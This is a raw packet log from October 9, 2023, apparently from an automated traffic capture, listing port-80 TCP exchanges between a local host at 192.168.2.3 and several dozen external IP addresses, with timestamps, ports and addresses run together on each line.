                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069051981 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069081068 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069116116 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069128036 CEST8049829104.21.42.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069161892 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069852114 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069906950 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069907904 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069969893 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069987059 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070033073 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070034981 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070079088 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070795059 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070823908 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070846081 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070873022 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070888996 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070936918 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070939064 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.070981026 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071708918 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071769953 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071774006 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071789980 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071818113 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071845055 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071892977 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.071935892 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.072643995 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.072662115 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.072694063 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.072721004 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.083873034 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.088749886 CEST8049829104.21.42.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.088825941 CEST4982980192.168.2.3104.21.42.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.089173079 CEST4983080192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.101716995 CEST804982896.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.103486061 CEST804982896.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.103589058 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.112392902 CEST80498273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.112426043 CEST80498273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.112466097 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.112492085 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.118115902 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126197100 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126230001 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126307964 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126378059 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126528025 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126528978 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126657009 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126718044 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126718998 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126770973 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126777887 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.126837015 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127157927 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127202988 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127208948 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127248049 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127419949 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127470970 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127475977 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127515078 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127523899 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127561092 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127573967 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.127625942 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128223896 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128273964 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128676891 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128742933 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128751993 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128767014 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128799915 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.128825903 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129076004 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129131079 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129192114 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129235983 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129241943 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129312992 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129338026 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.129388094 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130026102 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130064011 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130086899 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130115986 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130147934 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130196095 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130800009 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130863905 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.130966902 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131031990 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131058931 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131104946 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131241083 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131289005 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131290913 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131340981 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.131983995 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.132039070 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.132040024 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.132085085 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.146570921 CEST8049824104.26.11.81192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.146680117 CEST4982480192.168.2.3104.26.11.81
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.197396994 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.198431015 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.212994099 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.213260889 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.325431108 CEST8049826192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.325506926 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.348320961 CEST80498273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.353598118 CEST8049830210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.353708982 CEST4983080192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.354001045 CEST4983080192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.373153925 CEST4983480192.168.2.364.125.133.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.375708103 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.375799894 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.376475096 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.404597044 CEST804983369.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.404798031 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.405093908 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.418421030 CEST804982896.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.418647051 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.429373026 CEST80498313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.429519892 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.450001001 CEST4977180192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.454613924 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.466995955 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.539028883 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.595850945 CEST804983369.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.597141981 CEST804983369.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.597337961 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.597711086 CEST804983369.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.597771883 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.614696980 CEST4983380192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.615262032 CEST4983680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.618367910 CEST8049830210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.621491909 CEST8049830210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.621711016 CEST4983080192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.674673080 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.684830904 CEST80498313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.684855938 CEST80498313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.685034037 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.685034037 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.685539007 CEST4983180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.696614981 CEST8049835208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.696688890 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.715611935 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.733540058 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.805843115 CEST804983369.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.805994034 CEST804983669.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.806098938 CEST4983680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.806442022 CEST4983680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.809207916 CEST4983980192.168.2.3172.67.173.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.896635056 CEST804983813.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.896816015 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.897131920 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.903110027 CEST4978680192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.915425062 CEST80498313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.945158005 CEST8049835208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.945863962 CEST8049835208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.946067095 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.946525097 CEST8049835208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.946600914 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.958969116 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.959089041 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.965276003 CEST4983580192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.966531992 CEST4984080192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.971848965 CEST8049839172.67.173.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.971955061 CEST4983980192.168.2.3172.67.173.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.972575903 CEST4983980192.168.2.3172.67.173.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.993729115 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.993834019 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.994077921 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.997097969 CEST804983669.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.998224020 CEST804983669.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.998275995 CEST4983680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.998943090 CEST804983669.163.218.51192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.998990059 CEST4983680192.168.2.369.163.218.51
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.028238058 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.028350115 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.028493881 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.028631926 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.055342913 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.060101032 CEST804983813.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.060354948 CEST804983813.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.060543060 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.081542015 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.083458900 CEST4984180192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.136167049 CEST8049839172.67.173.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.144741058 CEST8049839172.67.173.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.144840002 CEST4983980192.168.2.3172.67.173.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.194610119 CEST8049835208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.195805073 CEST8049840208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.196928024 CEST4984080192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.199871063 CEST4984080192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.217869043 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.244894981 CEST804983813.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.245044947 CEST4983880192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.281440020 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.281481028 CEST8049832104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.281502008 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.281532049 CEST4983280192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.312875032 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.313138962 CEST8049841147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.313225985 CEST4984180192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.339148045 CEST4984180192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.363430023 CEST4984280192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364409924 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364434004 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364445925 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364455938 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364470959 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.364490986 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.365875959 CEST4984380192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.387540102 CEST4983480192.168.2.364.125.133.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399533033 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399554968 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399566889 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399578094 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399590015 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399600983 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399602890 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399626970 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.399657965 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.429194927 CEST8049840208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.430190086 CEST8049840208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.430790901 CEST8049840208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.430849075 CEST4984080192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.430849075 CEST4984080192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.441809893 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.510391951 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.512505054 CEST804979570.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.512569904 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.526047945 CEST804984223.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.526473999 CEST4984280192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.529726982 CEST4984280192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.530503988 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.568476915 CEST8049841147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.583029985 CEST8049841147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.583112955 CEST4984180192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.583456993 CEST8049841147.154.0.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.583502054 CEST4984180192.168.2.3147.154.0.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.632658005 CEST804984469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.632742882 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.633021116 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.641336918 CEST8049772213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.641544104 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.641890049 CEST4984680192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.653099060 CEST4980080192.168.2.396.91.204.114
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.672871113 CEST8049845104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.672951937 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.673183918 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683341980 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683415890 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683420897 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683468103 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683480024 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683521986 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683545113 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683593035 CEST4983780192.168.2.3217.79.184.35
